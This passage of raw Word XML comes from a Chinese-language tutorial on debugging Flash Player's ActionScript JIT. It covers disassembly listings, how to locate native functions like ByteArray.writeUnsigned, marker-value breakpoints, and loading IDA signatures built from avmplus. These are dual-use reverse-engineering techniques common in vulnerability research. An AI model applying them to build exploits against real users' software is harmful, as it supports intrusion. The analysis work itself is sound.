        <w:t>063797de 6a19            push    19h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRPr="0010296D" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0010296D">
        <w:t>063797e0 8b8d2cffffff    mov     ecx,dword ptr [ebp-0D4h]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRPr="00811AA2" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811AA2">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>063797e6 e805ab61fb      call    flashplayer_17_sa_debug!IAEModule_IAEKernel_UnloadModule+0x115d50 (019942f0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811AA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>//debug</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>line</w:t>
      </w:r>
      <w:r w:rsidRPr="00811AA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 25</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRPr="00811AA2" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRPr="0010296D" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0010296D">
        <w:t>063797eb 83c40c          add     esp,0Ch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRPr="0010296D" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0010296D">
        <w:t>063797ee 8b55a0          mov     edx,dword ptr [ebp-60h]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRPr="00307A0E" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307A0E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>063797f1 b8a0f4c53b      mov     eax,3BC5F4A0h</w:t>
      </w:r>
      <w:r w:rsidRPr="00307A0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRPr="00307A0E" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307A0E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>063797f6 35b1e5d42a      xor     eax,2AD4E5B1h</w:t>
      </w:r>
      <w:r w:rsidRPr="00307A0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">  //0x11111111</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRPr="0010296D" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0010296D">
        <w:t>063797fb 8b7208          mov     esi,dword ptr [edx+8]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRPr="0010296D" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0010296D">
        <w:t>063797fe 8b4e60          mov     ecx,dword ptr [esi+60h]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRPr="0010296D" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0010296D">
        <w:t>06379801 8bb534ffffff    mov     esi,dword ptr [ebp-0CCh]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRPr="0010296D" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0010296D">
        <w:t>06379807 899520ffffff    mov     dword ptr [ebp-0E0h],edx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRPr="0010296D" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0010296D">
        <w:t>0637980d 8d9520ffffff    lea     edx,[ebp-0E0h]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRPr="0010296D" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0010296D">
        <w:t>06379813 898524ffffff    mov     dword ptr [ebp-0DCh],eax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRPr="0010296D" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0010296D">
        <w:t>06379819 8b4104          mov     eax,dword ptr [ecx+4]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRPr="0010296D" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0010296D">
        <w:t>0637981c 83ec04          sub     esp,4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRPr="0010296D" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0010296D">
        <w:t>0637981f 52              push    edx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRPr="0010296D" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0010296D">
        <w:t>06379820 6a01            push    1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRPr="0010296D" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0010296D">
        <w:t>06379822 51              push    ecx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0010296D">
        <w:t>06379823 ffd0            call    eax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRPr="00EA110B" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000163AC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local1.</w:t>
      </w:r>
      <w:r w:rsidRPr="000163AC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>writeUnsigned</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>(0x11111111);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00622D46" w:rsidP="00653A00">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Find </w:t>
      </w:r>
      <w:r w:rsidR="00653A00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> func Code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找到了对应的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jit code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后，如何找到对应的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">AS NATIVE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的实现呢</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00"/>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一般对应的调用生成的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">jit code </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类似</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ush xx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ush num (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数个数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ush ecx/esi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>all method_pack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRPr="00E47B7A" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">bytearray.writeUnsigned </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数调用为例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ethod_pack </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00"/>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DA133AA" wp14:editId="7C47C8E9">
            <wp:extent cx="5274310" cy="1218463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00" w:rsidRDefault="00653A00" w:rsidP="00653A00"/>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68F38FC6" wp14:editId="62DF85CE">
            <wp:extent cx="5274310" cy="2218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00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到达</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">writeUnsigned </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00"/>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="341D18BD" wp14:editId="5B4AC986">
            <wp:extent cx="5274310" cy="58847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00" w:rsidRDefault="00653A00" w:rsidP="00653A00"/>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:r>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">riteUnsigned </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数对应的实现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F2202BA" wp14:editId="36CF8CBC">
            <wp:extent cx="5274310" cy="3198161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BD" w:rsidRPr="00457DBD" w:rsidRDefault="00457DBD" w:rsidP="00653A00">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不过也有很多其他类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本上往</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">call register </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方向去猜就对了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRPr="00DF6517" w:rsidRDefault="00653A00" w:rsidP="00653A00"/>
    <w:p w:rsidR="00653A00" w:rsidRDefault="009A08E7" w:rsidP="00653A00">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BreakPoint func</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00"/>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>很多时间比如我们想看一段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>method</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中某一段代码对应生成的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jit code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现怎么办呢？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00"/>
    <w:p w:rsidR="00653A00" w:rsidRPr="003633B2" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中有类似</w:t>
      </w:r>
      <w:r w:rsidRPr="003633B2">
        <w:t>Math.atan2(0xbabe, "[*] Creating object button...");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRPr="00C54DF2" w:rsidRDefault="00653A00" w:rsidP="00653A00"/>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我一般的做法是插入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bytearray.writeUnsigned(0x11111111);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根据传入不同的参数知晓当前在哪里，防止迷失在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jit code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00"/>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是每个版本的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>writeUnsigned</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数对应的实现地址不一样，一般都过搜索</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5356E91A" wp14:editId="48397E5C">
            <wp:extent cx="5274310" cy="1979087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00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">lea ebp,[esi+0x24h] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来定位</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60B1692F" wp14:editId="111D2125">
            <wp:extent cx="5274310" cy="193635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00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>V</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2+4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">writeUnsigned </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">+2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>则是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>writeShort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之类的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找到这个函数地址之后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下断点，断下来之后直接快速</w:t>
      </w:r>
      <w:r w:rsidR="008E4719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>步过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回就到了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JIT CODE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>区域了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B7062C" w:rsidRDefault="00B7062C" w:rsidP="00B7062C"/>
    <w:p w:rsidR="00653A00" w:rsidRPr="00A51B5D" w:rsidRDefault="00653A00" w:rsidP="00B7062C"/>
    <w:p w:rsidR="00653A00" w:rsidRDefault="005D616F" w:rsidP="00653A00">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Load </w:t>
      </w:r>
      <w:r w:rsidR="00653A00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SIG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00"/>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此前不久</w:t>
      </w:r>
      <w:r w:rsidR="00A84CF7" w:rsidRPr="00A84CF7">
        <w:t>h4ckmp</w:t>
      </w:r>
      <w:r w:rsidR="00A84CF7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="00A84CF7" w:rsidRPr="00A84CF7">
        <w:t>promised_lu</w:t>
      </w:r>
      <w:r w:rsidR="00A51B5D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:r w:rsidR="00A51B5D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位同学</w:t>
      </w:r>
      <w:r w:rsidR="00A84CF7" w:rsidRPr="00A84CF7">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00A84CF7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都把自己通过</w:t>
      </w:r>
      <w:r w:rsidR="00A84CF7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>avmplus</w:t>
      </w:r>
      <w:r w:rsidR="00A84CF7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>制作的</w:t>
      </w:r>
      <w:r w:rsidR="00A84CF7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sig</w:t>
      </w:r>
      <w:r w:rsidR="00A84CF7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发出来，导入到</w:t>
      </w:r>
      <w:r w:rsidR="00A84CF7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ida sig</w:t>
      </w:r>
      <w:r w:rsidR="00A84CF7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件夹之后，可以识别到不少的函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A84CF7" w:rsidRDefault="00A84CF7" w:rsidP="00653A00">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12779D07" wp14:editId="6E003839">
            <wp:extent cx="5229225" cy="1343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F7" w:rsidRDefault="00A84CF7" w:rsidP="00653A00"/>
    <w:p w:rsidR="00A84CF7" w:rsidRDefault="00A84CF7" w:rsidP="00653A00">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="747E4CA1" wp14:editId="6CAB01ED">
            <wp:extent cx="5274310" cy="78504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F7" w:rsidRDefault="00A84CF7" w:rsidP="00653A00"/>
    <w:p w:rsidR="00857AF9" w:rsidRDefault="00857AF9" w:rsidP="00653A00">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载链接</w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="00236AE1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
